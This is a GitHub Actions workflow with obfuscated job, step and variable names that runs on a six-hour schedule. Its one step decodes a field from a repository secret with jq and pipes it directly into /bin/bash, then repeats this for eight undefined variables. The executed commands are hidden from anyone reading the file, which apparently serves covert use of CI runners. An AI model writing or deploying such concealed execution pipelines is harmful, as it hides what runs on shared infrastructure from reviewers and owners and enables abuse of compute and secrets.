name: baiheizi7182

on:
  workflow_dispatch:
  schedule:
    - cron: '9 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baiheizi7182
        env:
          ufh9885: ${{ secrets.ufh9885 }}
        run: |
          echo $ufh9885 | jq -r .rdcu50379 | /bin/bash
          echo $mihti8082 | jq -r .itm69 | /bin/bash
          echo $k514 | jq -r .bb74 | /bin/bash
          echo $t12918 | jq -r .a5833 | /bin/bash
          echo $qfh0 | jq -r .qgfay4606 | /bin/bash
          echo $qtc837 | jq -r .quzpo82 | /bin/bash
          echo $a242 | jq -r .qhws5531 | /bin/bash
          echo $uof786 | jq -r .shamp9 | /bin/bash
          echo $c244 | jq -r .eqwj4176 | /bin/bash

